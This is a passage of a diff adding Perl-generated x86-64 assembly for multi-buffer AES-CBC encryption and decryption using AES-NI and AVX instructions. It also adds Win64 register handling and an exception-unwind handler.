+	aesdec		$rndkey0,@out[0]
+	aesdec		$rndkey0,@out[1]
+	aesdec		$rndkey0,@out[2]
+	aesdec		$rndkey0,@out[3]
+	movups		0xe0-0x78($key),$rndkey0
+	jmp	.Ldec4x_tail
+
+.align	32
+.Ldec4x_tail:
+	aesdec		$rndkey1,@out[0]
+	aesdec		$rndkey1,@out[1]
+	aesdec		$rndkey1,@out[2]
+	 pxor		$rndkey0,@inp[0]
+	 pxor		$rndkey0,@inp[1]
+	aesdec		$rndkey1,@out[3]
+	movdqu		0x10-0x78($key),$rndkey1
+	 pxor		$rndkey0,@inp[2]
+	 pxor		$rndkey0,@inp[3]
+	movdqu		0x20-0x78($key),$rndkey0
+
+	aesdeclast	@inp[0],@out[0]
+	aesdeclast	@inp[1],@out[1]
+	 movdqu		-16(@inptr[0],$offset),@inp[0]	# load next IV
+	 movdqu		-16(@inptr[1],$offset),@inp[1]
+	aesdeclast	@inp[2],@out[2]
+	aesdeclast	@inp[3],@out[3]
+	 movdqu		-16(@inptr[2],$offset),@inp[2]
+	 movdqu		-16(@inptr[3],$offset),@inp[3]
+
+	movups		@out[0],-16(@outptr[0],$offset)
+	 movdqu		(@inptr[0],$offset),@out[0]
+	movups		@out[1],-16(@outptr[1],$offset)	
+	 movdqu		(@inptr[1],$offset),@out[1]
+	 pxor		$zero,@out[0]
+	movups		@out[2],-16(@outptr[2],$offset)	
+	 movdqu		(@inptr[2],$offset),@out[2]
+	 pxor		$zero,@out[1]
+	movups		@out[3],-16(@outptr[3],$offset)
+	 movdqu		(@inptr[3],$offset),@out[3]
+	 pxor		$zero,@out[2]
+	 pxor		$zero,@out[3]
+
+	dec	$num
+	jnz	.Loop_dec4x
+
+	mov	16(%rsp),%rax			# original %rsp
+	mov	24(%rsp),$num
+
+	lea	`40*4`($inp),$inp
+	dec	$num
+	jnz	.Ldec4x_loop_grande
+
+.Ldec4x_done:
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	#movaps	-0x68(%rax),%xmm13
+	#movaps	-0x58(%rax),%xmm14
+	#movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Ldec4x_epilogue:
+	ret
+.size	aesni_multi_cbc_decrypt,.-aesni_multi_cbc_decrypt
+___
+
+						if ($avx) {{{
+my @ptr=map("%r$_",(8..15));
+my $offload=$sink;
+
+my @out=map("%xmm$_",(2..9));
+my @inp=map("%xmm$_",(10..13));
+my ($counters,$zero)=("%xmm14","%xmm15");
+
+$code.=<<___;
+.type	aesni_multi_cbc_encrypt_avx,\@function,3
+.align	32
+aesni_multi_cbc_encrypt_avx:
+_avx_cbc_enc_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,0x40(%rsp)
+	movaps	%xmm11,0x50(%rsp)
+	movaps	%xmm12,-0x78(%rax)
+	movaps	%xmm13,-0x68(%rax)
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+___
+$code.=<<___;
+	# stack layout
+	#
+	# +0	output sink
+	# +16	input sink [original %rsp and $num]
+	# +32	counters
+	# +64	distances between inputs and outputs
+	# +128	off-load area for @inp[0..3]
+
+	sub	\$192,%rsp
+	and	\$-128,%rsp
+	mov	%rax,16(%rsp)			# original %rsp
+
+.Lenc8x_body:
+	vzeroupper
+	vmovdqu	($key),$zero			# 0-round key
+	lea	0x78($key),$key			# size optimization
+	lea	40*4($inp),$inp
+	shr	\$1,$num
+
+.Lenc8x_loop_grande:
+	#mov	$num,24(%rsp)			# original $num
+	xor	$num,$num
+___
+for($i=0;$i<8;$i++) {
+  my $temp = $i ? $offload : $offset;
+    $code.=<<___;
+	mov	`40*$i+16-40*4`($inp),$one	# borrow $one for number of blocks
+	mov	`40*$i+0-40*4`($inp),@ptr[$i]	# input pointer
+	cmp	$num,$one
+	mov	`40*$i+8-40*4`($inp),$temp	# output pointer
+	cmovg	$one,$num			# find maximum
+	test	$one,$one
+	vmovdqu	`40*$i+24-40*4`($inp),@out[$i]	# load IV
+	mov	$one,`32+4*$i`(%rsp)		# initialize counters
+	cmovle	%rsp,@ptr[$i]			# cancel input
+	sub	@ptr[$i],$temp			# distance between input and output
+	mov	$temp,`64+8*$i`(%rsp)		# initialize distances
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Lenc8x_done
+
+	vmovups	0x10-0x78($key),$rndkey1
+	vmovups	0x20-0x78($key),$rndkey0
+	mov	0xf0-0x78($key),$rounds
+
+	vpxor	(@ptr[0]),$zero,@inp[0]		# load inputs and xor with 0-round
+	 lea	128(%rsp),$offload		# offload area
+	vpxor	(@ptr[1]),$zero,@inp[1]
+	vpxor	(@ptr[2]),$zero,@inp[2]
+	vpxor	(@ptr[3]),$zero,@inp[3]
+	 vpxor	@inp[0],@out[0],@out[0]
+	vpxor	(@ptr[4]),$zero,@inp[0]
+	 vpxor	@inp[1],@out[1],@out[1]
+	vpxor	(@ptr[5]),$zero,@inp[1]
+	 vpxor	@inp[2],@out[2],@out[2]
+	vpxor	(@ptr[6]),$zero,@inp[2]
+	 vpxor	@inp[3],@out[3],@out[3]
+	vpxor	(@ptr[7]),$zero,@inp[3]
+	 vpxor	@inp[0],@out[4],@out[4]
+	mov	\$1,$one			# constant of 1
+	 vpxor	@inp[1],@out[5],@out[5]
+	 vpxor	@inp[2],@out[6],@out[6]
+	 vpxor	@inp[3],@out[7],@out[7]
+	jmp	.Loop_enc8x
+
+.align	32
+.Loop_enc8x:
+___
+for($i=0;$i<8;$i++) {
+my $rndkey=($i&1)?$rndkey0:$rndkey1;
+$code.=<<___;
+	vaesenc		$rndkey,@out[0],@out[0]
+	 cmp		32+4*$i(%rsp),$one
+___
+$code.=<<___ if ($i);
+	 mov		64+8*$i(%rsp),$offset
+___
+$code.=<<___;
+	vaesenc		$rndkey,@out[1],@out[1]
+	prefetcht0	31(@ptr[$i])			# prefetch input
+	vaesenc		$rndkey,@out[2],@out[2]
+___
+$code.=<<___ if ($i>1);
+	prefetcht0	15(@ptr[$i-2])			# prefetch output
+___
+$code.=<<___;
+	vaesenc		$rndkey,@out[3],@out[3]
+	 lea		(@ptr[$i],$offset),$offset
+	 cmovge		%rsp,@ptr[$i]			# cancel input
+	vaesenc		$rndkey,@out[4],@out[4]
+	 cmovg		%rsp,$offset			# sink output
+	vaesenc		$rndkey,@out[5],@out[5]
+	 sub		@ptr[$i],$offset
+	vaesenc		$rndkey,@out[6],@out[6]
+	 vpxor		16(@ptr[$i]),$zero,@inp[$i%4]	# load input and xor with 0-round
+	 mov		$offset,64+8*$i(%rsp)
+	vaesenc		$rndkey,@out[7],@out[7]
+	vmovups		`16*(3+$i)-0x78`($key),$rndkey
+	 lea		16(@ptr[$i],$offset),@ptr[$i]	# switch to output
+___
+$code.=<<___ if ($i<4)
+	 vmovdqu	@inp[$i%4],`16*$i`($offload)	# off-load
+___
+}
+$code.=<<___;
+	 vmovdqu	32(%rsp),$counters
+	prefetcht0	15(@ptr[$i-2])			# prefetch output
+	prefetcht0	15(@ptr[$i-1])
+	cmp	\$11,$rounds
+	jb	.Lenc8x_tail
+
+	vaesenc		$rndkey1,@out[0],@out[0]
+	vaesenc		$rndkey1,@out[1],@out[1]
+	vaesenc		$rndkey1,@out[2],@out[2]
+	vaesenc		$rndkey1,@out[3],@out[3]
+	vaesenc		$rndkey1,@out[4],@out[4]
+	vaesenc		$rndkey1,@out[5],@out[5]
+	vaesenc		$rndkey1,@out[6],@out[6]
+	vaesenc		$rndkey1,@out[7],@out[7]
+	vmovups		0xb0-0x78($key),$rndkey1
+
+	vaesenc		$rndkey0,@out[0],@out[0]
+	vaesenc		$rndkey0,@out[1],@out[1]
+	vaesenc		$rndkey0,@out[2],@out[2]
+	vaesenc		$rndkey0,@out[3],@out[3]
+	vaesenc		$rndkey0,@out[4],@out[4]
+	vaesenc		$rndkey0,@out[5],@out[5]
+	vaesenc		$rndkey0,@out[6],@out[6]
+	vaesenc		$rndkey0,@out[7],@out[7]
+	vmovups		0xc0-0x78($key),$rndkey0
+	je	.Lenc8x_tail
+
+	vaesenc		$rndkey1,@out[0],@out[0]
+	vaesenc		$rndkey1,@out[1],@out[1]
+	vaesenc		$rndkey1,@out[2],@out[2]
+	vaesenc		$rndkey1,@out[3],@out[3]
+	vaesenc		$rndkey1,@out[4],@out[4]
+	vaesenc		$rndkey1,@out[5],@out[5]
+	vaesenc		$rndkey1,@out[6],@out[6]
+	vaesenc		$rndkey1,@out[7],@out[7]
+	vmovups		0xd0-0x78($key),$rndkey1
+
+	vaesenc		$rndkey0,@out[0],@out[0]
+	vaesenc		$rndkey0,@out[1],@out[1]
+	vaesenc		$rndkey0,@out[2],@out[2]
+	vaesenc		$rndkey0,@out[3],@out[3]
+	vaesenc		$rndkey0,@out[4],@out[4]
+	vaesenc		$rndkey0,@out[5],@out[5]
+	vaesenc		$rndkey0,@out[6],@out[6]
+	vaesenc		$rndkey0,@out[7],@out[7]
+	vmovups		0xe0-0x78($key),$rndkey0
+
+.Lenc8x_tail:
+	vaesenc		$rndkey1,@out[0],@out[0]
+	 vpxor		$zero,$zero,$zero
+	vaesenc		$rndkey1,@out[1],@out[1]
+	vaesenc		$rndkey1,@out[2],@out[2]
+	 vpcmpgtd	$zero,$counters,$zero
+	vaesenc		$rndkey1,@out[3],@out[3]
+	vaesenc		$rndkey1,@out[4],@out[4]
+	 vpaddd		$counters,$zero,$zero		# decrement counters
+	 vmovdqu	48(%rsp),$counters
+	vaesenc		$rndkey1,@out[5],@out[5]
+	 mov		64(%rsp),$offset		# pre-load 1st offset
+	vaesenc		$rndkey1,@out[6],@out[6]
+	vaesenc		$rndkey1,@out[7],@out[7]
+	vmovups		0x10-0x78($key),$rndkey1
+
+	vaesenclast	$rndkey0,@out[0],@out[0]
+	 vmovdqa	$zero,32(%rsp)			# update counters
+	 vpxor		$zero,$zero,$zero
+	vaesenclast	$rndkey0,@out[1],@out[1]
+	vaesenclast	$rndkey0,@out[2],@out[2]
+	 vpcmpgtd	$zero,$counters,$zero
+	vaesenclast	$rndkey0,@out[3],@out[3]
+	vaesenclast	$rndkey0,@out[4],@out[4]
+	 vpaddd		$zero,$counters,$counters	# decrement counters
+	 vmovdqu	-0x78($key),$zero		# 0-round
+	vaesenclast	$rndkey0,@out[5],@out[5]
+	vaesenclast	$rndkey0,@out[6],@out[6]
+	 vmovdqa	$counters,48(%rsp)		# update counters
+	vaesenclast	$rndkey0,@out[7],@out[7]
+	vmovups		0x20-0x78($key),$rndkey0
+
+	vmovups		@out[0],-16(@ptr[0])		# write output
+	 sub		$offset,@ptr[0]			# switch to input
+	 vpxor		0x00($offload),@out[0],@out[0]
+	vmovups		@out[1],-16(@ptr[1])	
+	 sub		`64+1*8`(%rsp),@ptr[1]
+	 vpxor		0x10($offload),@out[1],@out[1]
+	vmovups		@out[2],-16(@ptr[2])	
+	 sub		`64+2*8`(%rsp),@ptr[2]
+	 vpxor		0x20($offload),@out[2],@out[2]
+	vmovups		@out[3],-16(@ptr[3])
+	 sub		`64+3*8`(%rsp),@ptr[3]
+	 vpxor		0x30($offload),@out[3],@out[3]
+	vmovups		@out[4],-16(@ptr[4])
+	 sub		`64+4*8`(%rsp),@ptr[4]
+	 vpxor		@inp[0],@out[4],@out[4]
+	vmovups		@out[5],-16(@ptr[5])	
+	 sub		`64+5*8`(%rsp),@ptr[5]
+	 vpxor		@inp[1],@out[5],@out[5]
+	vmovups		@out[6],-16(@ptr[6])	
+	 sub		`64+6*8`(%rsp),@ptr[6]
+	 vpxor		@inp[2],@out[6],@out[6]
+	vmovups		@out[7],-16(@ptr[7])
+	 sub		`64+7*8`(%rsp),@ptr[7]
+	 vpxor		@inp[3],@out[7],@out[7]
+
+	dec	$num
+	jnz	.Loop_enc8x
+
+	mov	16(%rsp),%rax			# original %rsp
+	#mov	24(%rsp),$num
+	#lea	`40*8`($inp),$inp
+	#dec	$num
+	#jnz	.Lenc8x_loop_grande
+
+.Lenc8x_done:
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lenc8x_epilogue:
+	ret
+.size	aesni_multi_cbc_encrypt_avx,.-aesni_multi_cbc_encrypt_avx
+
+.type	aesni_multi_cbc_decrypt_avx,\@function,3
+.align	32
+aesni_multi_cbc_decrypt_avx:
+_avx_cbc_dec_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,0x40(%rsp)
+	movaps	%xmm11,0x50(%rsp)
+	movaps	%xmm12,-0x78(%rax)
+	movaps	%xmm13,-0x68(%rax)
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+___
+$code.=<<___;
+	# stack layout
+	#
+	# +0	output sink
+	# +16	input sink [original %rsp and $num]
+	# +32	counters
+	# +64	distances between inputs and outputs
+	# +128	off-load area for @inp[0..3]
+	# +192	IV/input offload
+
+	sub	\$256,%rsp
+	and	\$-256,%rsp
+	sub	\$192,%rsp
+	mov	%rax,16(%rsp)			# original %rsp
+
+.Ldec8x_body:
+	vzeroupper
+	vmovdqu	($key),$zero			# 0-round key
+	lea	0x78($key),$key			# size optimization
+	lea	40*4($inp),$inp
+	shr	\$1,$num
+
+.Ldec8x_loop_grande:
+	#mov	$num,24(%rsp)			# original $num
+	xor	$num,$num
+___
+for($i=0;$i<8;$i++) {
+  my $temp = $i ? $offload : $offset;
+    $code.=<<___;
+	mov	`40*$i+16-40*4`($inp),$one	# borrow $one for number of blocks
+	mov	`40*$i+0-40*4`($inp),@ptr[$i]	# input pointer
+	cmp	$num,$one
+	mov	`40*$i+8-40*4`($inp),$temp	# output pointer
+	cmovg	$one,$num			# find maximum
+	test	$one,$one
+	vmovdqu	`40*$i+24-40*4`($inp),@out[$i]	# load IV
+	mov	$one,`32+4*$i`(%rsp)		# initialize counters
+	cmovle	%rsp,@ptr[$i]			# cancel input
+	sub	@ptr[$i],$temp			# distance between input and output
+	mov	$temp,`64+8*$i`(%rsp)		# initialize distances
+	vmovdqu	@out[$i],`192+16*$i`(%rsp)	# offload IV
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldec8x_done
+
+	vmovups	0x10-0x78($key),$rndkey1
+	vmovups	0x20-0x78($key),$rndkey0
+	mov	0xf0-0x78($key),$rounds
+	 lea	192+128(%rsp),$offload		# offload area
+
+	vmovdqu	(@ptr[0]),@out[0]		# load inputs
+	vmovdqu	(@ptr[1]),@out[1]
+	vmovdqu	(@ptr[2]),@out[2]
+	vmovdqu	(@ptr[3]),@out[3]
+	vmovdqu	(@ptr[4]),@out[4]
+	vmovdqu	(@ptr[5]),@out[5]
+	vmovdqu	(@ptr[6]),@out[6]
+	vmovdqu	(@ptr[7]),@out[7]
+	vmovdqu	@out[0],0x00($offload)		# offload inputs
+	vpxor	$zero,@out[0],@out[0]		# xor inputs with 0-round
+	vmovdqu	@out[1],0x10($offload)
+	vpxor	$zero,@out[1],@out[1]
+	vmovdqu	@out[2],0x20($offload)
+	vpxor	$zero,@out[2],@out[2]
+	vmovdqu	@out[3],0x30($offload)
+	vpxor	$zero,@out[3],@out[3]
+	vmovdqu	@out[4],0x40($offload)
+	vpxor	$zero,@out[4],@out[4]
+	vmovdqu	@out[5],0x50($offload)
+	vpxor	$zero,@out[5],@out[5]
+	vmovdqu	@out[6],0x60($offload)
+	vpxor	$zero,@out[6],@out[6]
+	vmovdqu	@out[7],0x70($offload)
+	vpxor	$zero,@out[7],@out[7]
+	xor	\$0x80,$offload
+	mov	\$1,$one			# constant of 1
+	jmp	.Loop_dec8x
+
+.align	32
+.Loop_dec8x:
+___
+for($i=0;$i<8;$i++) {
+my $rndkey=($i&1)?$rndkey0:$rndkey1;
+$code.=<<___;
+	vaesdec		$rndkey,@out[0],@out[0]
+	 cmp		32+4*$i(%rsp),$one
+___
+$code.=<<___ if ($i);
+	 mov		64+8*$i(%rsp),$offset
+___
+$code.=<<___;
+	vaesdec		$rndkey,@out[1],@out[1]
+	prefetcht0	31(@ptr[$i])			# prefetch input
+	vaesdec		$rndkey,@out[2],@out[2]
+___
+$code.=<<___ if ($i>1);
+	prefetcht0	15(@ptr[$i-2])			# prefetch output
+___
+$code.=<<___;
+	vaesdec		$rndkey,@out[3],@out[3]
+	 lea		(@ptr[$i],$offset),$offset
+	 cmovge		%rsp,@ptr[$i]			# cancel input
+	vaesdec		$rndkey,@out[4],@out[4]
+	 cmovg		%rsp,$offset			# sink output
+	vaesdec		$rndkey,@out[5],@out[5]
+	 sub		@ptr[$i],$offset
+	vaesdec		$rndkey,@out[6],@out[6]
+	 vmovdqu	16(@ptr[$i]),@inp[$i%4]		# load input
+	 mov		$offset,64+8*$i(%rsp)
+	vaesdec		$rndkey,@out[7],@out[7]
+	vmovups		`16*(3+$i)-0x78`($key),$rndkey
+	 lea		16(@ptr[$i],$offset),@ptr[$i]	# switch to output
+___
+$code.=<<___ if ($i<4);
+	 vmovdqu	@inp[$i%4],`128+16*$i`(%rsp)	# off-load
+___
+}
+$code.=<<___;
+	 vmovdqu	32(%rsp),$counters
+	prefetcht0	15(@ptr[$i-2])			# prefetch output
+	prefetcht0	15(@ptr[$i-1])
+	cmp	\$11,$rounds
+	jb	.Ldec8x_tail
+
+	vaesdec		$rndkey1,@out[0],@out[0]
+	vaesdec		$rndkey1,@out[1],@out[1]
+	vaesdec		$rndkey1,@out[2],@out[2]
+	vaesdec		$rndkey1,@out[3],@out[3]
+	vaesdec		$rndkey1,@out[4],@out[4]
+	vaesdec		$rndkey1,@out[5],@out[5]
+	vaesdec		$rndkey1,@out[6],@out[6]
+	vaesdec		$rndkey1,@out[7],@out[7]
+	vmovups		0xb0-0x78($key),$rndkey1
+
+	vaesdec		$rndkey0,@out[0],@out[0]
+	vaesdec		$rndkey0,@out[1],@out[1]
+	vaesdec		$rndkey0,@out[2],@out[2]
+	vaesdec		$rndkey0,@out[3],@out[3]
+	vaesdec		$rndkey0,@out[4],@out[4]
+	vaesdec		$rndkey0,@out[5],@out[5]
+	vaesdec		$rndkey0,@out[6],@out[6]
+	vaesdec		$rndkey0,@out[7],@out[7]
+	vmovups		0xc0-0x78($key),$rndkey0
+	je	.Ldec8x_tail
+
+	vaesdec		$rndkey1,@out[0],@out[0]
+	vaesdec		$rndkey1,@out[1],@out[1]
+	vaesdec		$rndkey1,@out[2],@out[2]
+	vaesdec		$rndkey1,@out[3],@out[3]
+	vaesdec		$rndkey1,@out[4],@out[4]
+	vaesdec		$rndkey1,@out[5],@out[5]
+	vaesdec		$rndkey1,@out[6],@out[6]
+	vaesdec		$rndkey1,@out[7],@out[7]
+	vmovups		0xd0-0x78($key),$rndkey1
+
+	vaesdec		$rndkey0,@out[0],@out[0]
+	vaesdec		$rndkey0,@out[1],@out[1]
+	vaesdec		$rndkey0,@out[2],@out[2]
+	vaesdec		$rndkey0,@out[3],@out[3]
+	vaesdec		$rndkey0,@out[4],@out[4]
+	vaesdec		$rndkey0,@out[5],@out[5]
+	vaesdec		$rndkey0,@out[6],@out[6]
+	vaesdec		$rndkey0,@out[7],@out[7]
+	vmovups		0xe0-0x78($key),$rndkey0
+
+.Ldec8x_tail:
+	vaesdec		$rndkey1,@out[0],@out[0]
+	 vpxor		$zero,$zero,$zero
+	vaesdec		$rndkey1,@out[1],@out[1]
+	vaesdec		$rndkey1,@out[2],@out[2]
+	 vpcmpgtd	$zero,$counters,$zero
+	vaesdec		$rndkey1,@out[3],@out[3]
+	vaesdec		$rndkey1,@out[4],@out[4]
+	 vpaddd		$counters,$zero,$zero		# decrement counters
+	 vmovdqu	48(%rsp),$counters
+	vaesdec		$rndkey1,@out[5],@out[5]
+	 mov		64(%rsp),$offset		# pre-load 1st offset
+	vaesdec		$rndkey1,@out[6],@out[6]
+	vaesdec		$rndkey1,@out[7],@out[7]
+	vmovups		0x10-0x78($key),$rndkey1
+
+	vaesdeclast	$rndkey0,@out[0],@out[0]
+	 vmovdqa	$zero,32(%rsp)			# update counters
+	 vpxor		$zero,$zero,$zero
+	vaesdeclast	$rndkey0,@out[1],@out[1]
+	vpxor		0x00($offload),@out[0],@out[0]	# xor with IV
+	vaesdeclast	$rndkey0,@out[2],@out[2]
+	vpxor		0x10($offload),@out[1],@out[1]
+	 vpcmpgtd	$zero,$counters,$zero
+	vaesdeclast	$rndkey0,@out[3],@out[3]
+	vpxor		0x20($offload),@out[2],@out[2]
+	vaesdeclast	$rndkey0,@out[4],@out[4]
+	vpxor		0x30($offload),@out[3],@out[3]
+	 vpaddd		$zero,$counters,$counters	# decrement counters
+	 vmovdqu	-0x78($key),$zero		# 0-round
+	vaesdeclast	$rndkey0,@out[5],@out[5]
+	vpxor		0x40($offload),@out[4],@out[4]
+	vaesdeclast	$rndkey0,@out[6],@out[6]
+	vpxor		0x50($offload),@out[5],@out[5]
+	 vmovdqa	$counters,48(%rsp)		# update counters
+	vaesdeclast	$rndkey0,@out[7],@out[7]
+	vpxor		0x60($offload),@out[6],@out[6]
+	vmovups		0x20-0x78($key),$rndkey0
+
+	vmovups		@out[0],-16(@ptr[0])		# write output
+	 sub		$offset,@ptr[0]			# switch to input
+	 vmovdqu	128+0(%rsp),@out[0]
+	vpxor		0x70($offload),@out[7],@out[7]
+	vmovups		@out[1],-16(@ptr[1])	
+	 sub		`64+1*8`(%rsp),@ptr[1]
+	 vmovdqu	@out[0],0x00($offload)
+	 vpxor		$zero,@out[0],@out[0]
+	 vmovdqu	128+16(%rsp),@out[1]
+	vmovups		@out[2],-16(@ptr[2])	
+	 sub		`64+2*8`(%rsp),@ptr[2]
+	 vmovdqu	@out[1],0x10($offload)
+	 vpxor		$zero,@out[1],@out[1]
+	 vmovdqu	128+32(%rsp),@out[2]
+	vmovups		@out[3],-16(@ptr[3])
+	 sub		`64+3*8`(%rsp),@ptr[3]
+	 vmovdqu	@out[2],0x20($offload)
+	 vpxor		$zero,@out[2],@out[2]
+	 vmovdqu	128+48(%rsp),@out[3]
+	vmovups		@out[4],-16(@ptr[4])
+	 sub		`64+4*8`(%rsp),@ptr[4]
+	 vmovdqu	@out[3],0x30($offload)
+	 vpxor		$zero,@out[3],@out[3]
+	 vmovdqu	@inp[0],0x40($offload)
+	 vpxor		@inp[0],$zero,@out[4]
+	vmovups		@out[5],-16(@ptr[5])	
+	 sub		`64+5*8`(%rsp),@ptr[5]
+	 vmovdqu	@inp[1],0x50($offload)
+	 vpxor		@inp[1],$zero,@out[5]
+	vmovups		@out[6],-16(@ptr[6])	
+	 sub		`64+6*8`(%rsp),@ptr[6]
+	 vmovdqu	@inp[2],0x60($offload)
+	 vpxor		@inp[2],$zero,@out[6]
+	vmovups		@out[7],-16(@ptr[7])
+	 sub		`64+7*8`(%rsp),@ptr[7]
+	 vmovdqu	@inp[3],0x70($offload)
+	 vpxor		@inp[3],$zero,@out[7]
+
+	xor	\$128,$offload
+	dec	$num
+	jnz	.Loop_dec8x
+
+	mov	16(%rsp),%rax			# original %rsp
+	#mov	24(%rsp),$num
+	#lea	`40*8`($inp),$inp
+	#dec	$num
+	#jnz	.Ldec8x_loop_grande
+
+.Ldec8x_done:
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Ldec8x_epilogue:
+	ret
+.size	aesni_multi_cbc_decrypt_avx,.-aesni_multi_cbc_decrypt_avx
+___
+						}}}
+
+if ($win64) {
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<.Lprologue
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lin_prologue
+
+	mov	16(%rax),%rax		# pull saved stack pointer
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore cotnext->R12
+	mov	%r13,224($context)	# restore cotnext->R13
+	mov	%r14,232($context)	# restore cotnext->R14
+	mov	%r15,240($context)	# restore cotnext->R15
+
+	lea	-56-10*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_aesni_multi_cbc_encrypt
+	.rva	.LSEH_end_aesni_multi_cbc_encrypt
+	.rva	.LSEH_info_aesni_multi_cbc_encrypt
+	.rva	.LSEH_begin_aesni_multi_cbc_decrypt
+	.rva	.LSEH_end_aesni_multi_cbc_decrypt
+	.rva	.LSEH_info_aesni_multi_cbc_decrypt
+___
+$code.=<<___ if ($avx);
+	.rva	.LSEH_begin_aesni_multi_cbc_encrypt_avx
+	.rva	.LSEH_end_aesni_multi_cbc_encrypt_avx
+	.rva	.LSEH_info_aesni_multi_cbc_encrypt_avx
